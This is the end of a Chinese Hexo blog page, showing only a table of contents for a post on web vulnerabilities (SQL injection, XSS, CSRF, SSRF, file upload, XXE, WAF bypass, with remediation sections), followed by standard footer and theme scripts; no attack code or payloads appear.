class="nav-link" href="#SQL注入进阶"><span class="nav-number">4.1.2.</span> <span class="nav-text">SQL注入进阶</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#时间注入"><span class="nav-number">4.1.2.1.</span> <span class="nav-text">时间注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#堆叠查询注入"><span class="nav-number">4.1.2.2.</span> <span class="nav-text">堆叠查询注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#二次注入"><span class="nav-number">4.1.2.3.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#宽字节注入"><span class="nav-number">4.1.2.4.</span> <span class="nav-text">宽字节注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Cookie注入"><span class="nav-number">4.1.2.5.</span> <span class="nav-text">Cookie注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Base64注入"><span class="nav-number">4.1.2.6.</span> <span class="nav-text">Base64注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#XFF注入"><span class="nav-number">4.1.2.7.</span> <span class="nav-text">XFF注入</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入绕过方式"><span class="nav-number">4.1.3.</span> <span class="nav-text">SQL注入绕过方式</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#大小写绕过"><span class="nav-number">4.1.3.1.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#双写绕过"><span class="nav-number">4.1.3.2.</span> <span class="nav-text">双写绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#编码绕过"><span class="nav-number">4.1.3.3.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#内联注释绕过"><span class="nav-number">4.1.3.4.</span> <span class="nav-text">内联注释绕过</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码防范SQL注入"><span class="nav-number">4.1.4.</span> <span class="nav-text">代码防范SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#过滤危险字符"><span class="nav-number">4.1.4.1.</span> <span class="nav-text">过滤危险字符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#使用预编译语"><span class="nav-number">4.1.4.2.</span> <span class="nav-text">使用预编译语</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS"><span class="nav-number">4.2.</span> <span class="nav-text">XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介"><span class="nav-number">4.2.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS基础"><span class="nav-number">4.2.2.</span> <span class="nav-text">XSS基础</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#反射型XSS"><span class="nav-number">4.2.2.1.</span> <span class="nav-text">反射型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#存储型XSS"><span class="nav-number">4.2.2.2.</span> <span class="nav-text">存储型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#DOM型XSS"><span class="nav-number">4.2.2.3.</span> <span class="nav-text">DOM型XSS</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS进阶"><span class="nav-number">4.2.3.</span> <span class="nav-text">XSS进阶</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#常用测试语句及编码绕过"><span class="nav-number">4.2.3.1.</span> <span class="nav-text">常用测试语句及编码绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#XSS漏洞修复"><span class="nav-number">4.2.3.2.</span> <span class="nav-text">XSS漏洞修复</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF"><span class="nav-number">4.3.</span> <span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-1"><span class="nav-number">4.3.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CSRF漏洞代码"><span class="nav-number">4.3.2.</span> <span class="nav-text">CSRF漏洞代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修复建议"><span class="nav-number">4.3.3.</span> <span class="nav-text">修复建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF"><span class="nav-number">4.4.</span> <span class="nav-text">SSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-2"><span class="nav-number">4.4.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#攻击方式"><span class="nav-number">4.4.2.</span> <span class="nav-text">攻击方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码分析"><span class="nav-number">4.4.3.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修复建议-1"><span class="nav-number">4.4.4.</span> <span class="nav-text">修复建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件上传漏洞"><span class="nav-number">4.5.</span> <span class="nav-text">文件上传漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-3"><span class="nav-number">4.5.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#JS检测绕过攻击"><span class="nav-number">4.5.2.</span> <span class="nav-text">JS检测绕过攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-1"><span class="nav-number">4.5.2.1.</span> <span class="nav-text">代码分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件后缀绕过攻击"><span class="nav-number">4.5.3.</span> <span class="nav-text">文件后缀绕过攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-2"><span class="nav-number">4.5.3.1.</span> <span class="nav-text">代码分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件类型绕过攻击"><span class="nav-number">4.5.4.</span> <span class="nav-text">文件类型绕过攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-3"><span class="nav-number">4.5.4.1.</span> <span class="nav-text">代码分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件截断绕过攻击"><span class="nav-number">4.5.5.</span> <span class="nav-text">文件截断绕过攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-4"><span class="nav-number">4.5.5.1.</span> <span class="nav-text">代码分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#竞争条件攻击"><span class="nav-number">4.5.6.</span> <span class="nav-text">竞争条件攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-5"><span class="nav-number">4.5.6.1.</span> <span class="nav-text">代码分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修复建议-2"><span class="nav-number">4.5.7.</span> <span class="nav-text">修复建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#暴力破解"><span class="nav-number">4.6.</span> <span class="nav-text">暴力破解</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-4"><span class="nav-number">4.6.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码分析-6"><span class="nav-number">4.6.2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修复建议-3"><span class="nav-number">4.6.3.</span> <span class="nav-text">修复建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#命令执行"><span class="nav-number">4.7.</span> <span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-5"><span class="nav-number">4.7.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码分析-7"><span class="nav-number">4.7.2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修复建议-4"><span class="nav-number">4.7.3.</span> <span class="nav-text">修复建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#逻辑漏洞挖掘"><span class="nav-number">4.8.</span> <span class="nav-text">逻辑漏洞挖掘</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-6"><span class="nav-number">4.8.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#越权访问攻击"><span class="nav-number">4.8.2.</span> <span class="nav-text">越权访问攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#代码分析-8"><span class="nav-number">4.8.2.1.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#GET-和-POST"><span class="nav-number">4.8.2.2.</span> <span class="nav-text">GET 和 POST</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#修复建议-5"><span class="nav-number">4.8.2.3.</span> <span class="nav-text">修复建议</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XXE漏洞"><span class="nav-number">4.9.</span> <span class="nav-text">XXE漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-7"><span class="nav-number">4.9.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码分析-9"><span class="nav-number">4.9.2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#防范建议"><span class="nav-number">4.9.3.</span> <span class="nav-text">防范建议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WAF"><span class="nav-number">4.10.</span> <span class="nav-text">WAF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简介-8"><span class="nav-number">4.10.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断WAF方法"><span class="nav-number">4.10.2.</span> <span class="nav-text">判断WAF方法</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#SQLMap-1"><span class="nav-number">4.10.2.1.</span> <span class="nav-text">SQLMap</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#WAF绕过方式"><span class="nav-number">4.10.2.2.</span> <span class="nav-text">WAF绕过方式</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ssilent</span>

  
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>


<!--

 <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>

  -->


  <span class="post-meta-divider">|</span>


<!--

  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>

-->



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共17k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/blog/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/blog/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/blog/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/blog/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/blog/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/blog/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script>

  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'lYp2MtSUmdwhTqLdx7PMPM2R-gzGzoHsz',
        appKey: 'tuvkxTJOf6ngjmCMKwn7e5TS',
        placeholder: '旺仔QQ糖，你也要来一颗吗？',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  

  
  
  
<script src="/blog/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-shiziku"},"display":{"position":"left","width":75,"height":150},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>
